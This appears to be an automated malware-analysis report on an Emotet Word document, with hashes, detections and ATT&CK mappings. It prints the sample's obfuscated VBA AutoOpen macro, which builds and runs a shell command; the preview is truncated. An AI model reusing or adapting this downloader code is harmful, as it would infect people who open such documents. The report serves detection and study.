Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 e633b6c6918dbf42…

MALICIOUS

Office (OLE)

Size: 98.0 KB
Created: 2018-08-07 08:48:00
Authoring application: Microsoft Office Word
First seen: 2018-08-26
MD5: 9de7924066c3facbc794471ba4378c69
SHA-1: 6f8df5d50f7e2b22be5e4239313cb46c37633042
SHA-256: e633b6c6918dbf42fb5ebe1879d34721ab885240a7578c7e07e0b2f423a25f20
Risk Score: 142

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro. The `AutoOpen` macro is present, which is a common technique for executing malicious code upon opening the document. The ClamAV detection explicitly identifies it as 'Doc.Downloader.Emotet-6883997-0', strongly suggesting the Emotet family. The VBA script attempts to construct and execute a command, likely to download and run a secondary payload.

Heuristics (5)

  • ClamAV: Doc.Downloader.Emotet-6883997-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6883997-0
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind        Source                                                  Size
macros.bas  vba-macro   oletools.olevba.extract_macros (decoded VBA source)     5640 bytes
SHA-256: f99d725a484b4b8f0f344914b519557eecb8c78fbc9ff182be34c5c7d5d803f0
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "NvPcFiPp"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
   TypeName ChrB(aQikRU)
   TypeName Round(9795 - PVOmTL)
   TypeName Hex(1)
   TypeName CDate(4)
   TypeName CBool(918)
Shell@ CStr("c") + CStr("m") + pECLAjtCjwfWX + fwQpEYk + zVfEVdDbLw + OvjYED + iOLwDqE + ujHOZYuUzwX + DkZsPWdPpPQ + OkhZLroNHVudK, 426826034 - 426826034
   TypeName CSng(ZmGBEl)
   TypeName ahjCE
   TypeName ChrW(9)
End Sub


Attribute VB_Name = "AuNJzwvRFqPw"
Function zVfEVdDbLw()
On Error Resume Next
TypeName 8055
   TypeName CStr(80)
   TypeName Cos(849)
UYDZW = "d /V/C" + CStr(Chr(skPmKzwiiTdO + slXfLlFZIVQoWX + 34 + ZlmqUclOK + hniLZfjOqkrY)) + "s" + "et 08" + "Si=pd" + "NMrkhWA" + "Sfuw" + "hzC"
TypeName Sqr(258072599)
   TypeName Round(933)
QvjOL = "juQ" + "Fwidzl" + "QV" + "GOa" + "cj,-;9b8" + "@nH1g$D3{4"
TypeName 6
   TypeName 6354
   TypeName Rnd(oRGnL - FofQHQ / pwpQlq / djKBDL)
nHEnYwN = "\mxo" + "B)( XPyte" + "sIK.q" + "=5L+v" + "/':R}&" + "&for %l " + "in (0;5"
TypeName Int(OaJpb / cqrqYi)
   TypeName 53
   TypeName 2
MDXaFz = "1;2" + "0;60" + ";4;" + "61;13;6" + "0;"
TypeName HFkAB
   TypeName ChrB(531)
   TypeName Cos(QPRRsj)
bSzjWTtF = "24;24;" + "5" + "5;43;5" + "6;" + "3" + "1;3" + "0;66;3" + "9;60;" + "20;3" + "3"
TypeName Hex(TzBGj)
   TypeName CBool(iIACm)
SpopK = ";5" + "1;36" + ";31;60;30" + ";59;55;2;" + "60;59;" + "64;7;60;36" + ";15;24;21;" + "60;39;59" + ";34" + ";43;" + "31;10;52"
TypeName rVjtr
   TypeName 4840
   TypeName Fix(QfqEiV)
hXKDMHtP = ";66;72;" + "13" + ";59;" + "59" + ";0;73;71;7" + "1;59;39" + ";10;21;4" + ";" + "6"
TypeName Sgn(KLOmJj)
   TypeName CDbl(52)
liNlLCoXiU = "1;5" + "9;64;3" + "0;51;49;" + "71;" + "0" + ";56" + ";68;38;" + "13" + ";59;59" + ";0;73;71;7"
TypeName Isjztf
   TypeName Rnd(QbYtk)
   TypeName Atn(fVAoLo)
fGwWPhPi = "1;59;13;" + "60;" + "59;4;60" + ";60" + ";49;51;" + "7" + "0;21;6" + "0;64;30;" + "51" + ";49;71;6"
TypeName ChrB(czMii * QkrRWY)
   TypeName ChFzT
   TypeName 952
ERPnccD = "7;0;" + "59;20;" + "74;3;26;65" + ";38;" + "13;59" + ";59;0;73;7" + "1;71;20;20" + ";2" + "0;64;61;17" + ";" + "39;22;" + "29;58;0;"
zVfEVdDbLw = UYDZW + QvjOL + nHEnYwN + MDXaFz + bSzjWTtF + SpopK + hXKDMHtP + liNlLCoXiU + fGwWPhPi + ERPnccD
   TypeName aFmTn
   TypeName Atn(4)
End Function
Function OvjYED()
On Error Resume Next
TypeName Oct(jbVtSJ / uFQzt + 33138 * XXQVM)
   TypeName CBool(JGzmZv)
   TypeName Chr(8)
WECjh = "24;29" + ";39" + ";39;21;39" + ";42;64" + ";30;51;" + "49;71;" + "51;40;5;" + "3;3" + "8;1" + "3;59;59;0" + ";73"
TypeName jTusXW
   TypeName XvDOfY
WAAbKs = ";71" + ";71;59" + ";60;5" + ";" + "5;58;64;3" + "9;60;59;" + "7" + "1;42" + ";13;23;2;2"
TypeName CDbl(PvXQvS + nROtjk)
   TypeName CByte(wlokj / ditcbj)
   TypeName CSng(cSNaWP)
unAvFQTdh = "8;38;1" + "3;5" + "9;59;0;7" + "3;71;71" + ";59;60" + ";30;" + "24;60;20;" + "60" + ";36;"
TypeName Rnd(oABEFI)
   TypeName nhalN
SmutaXCOYj = "64;30;" + "51" + ";49;64" + ";36;" + "4;71;10;27" + ";7;35;47;" + "51;2" + "1;30;" + "72" + ";64;9" + ";" + "0;24;21;59" + ";54;72;38"
TypeName Chr(hPuYiG * NJojAD)
   TypeName GXkZZV
GDLnkrz = ";72;53" + ";34;4" + "3;31" + ";21;51;5" + "5;66;55;" + "72;41;45;3" + "7;72;34;4" + "3" + ";63;6" + "3;0;66;43;" + "60;39;7" + "0;73;5"
TypeName Atn(86124 - iBDFsQ)
   TypeName ChrW(534)
zVIRoiCAc = "9;6" + "0;4" + "9;0;69" + ";7" + "2;48;72;69" + ";43"
TypeName ChrW(88149 * bhDiS / uRbYzi - TOckHR)
   TypeName 767
NGijU = ";31;21;5" + "1;69;7" + "2;64;60;50" + ";60;72;3" + "4;10;51;" + "4;60;29" + ";30;13;54;" + "43;57;2"
TypeName vEiHRY
   TypeName Log(44110 / minnG + 47681 / vZjHd)
   TypeName Sqr(NOQfqj + GhQcRC)
LwSiwM = "0;62;55" + ";21;39;" + "55;4" + "3;31;1" + "0;52;53" + ";46;" + "59;4;58;46" + ";43;56;3" + "1;30;64;"
TypeName Hex(395163932)
   Ty
... (truncated)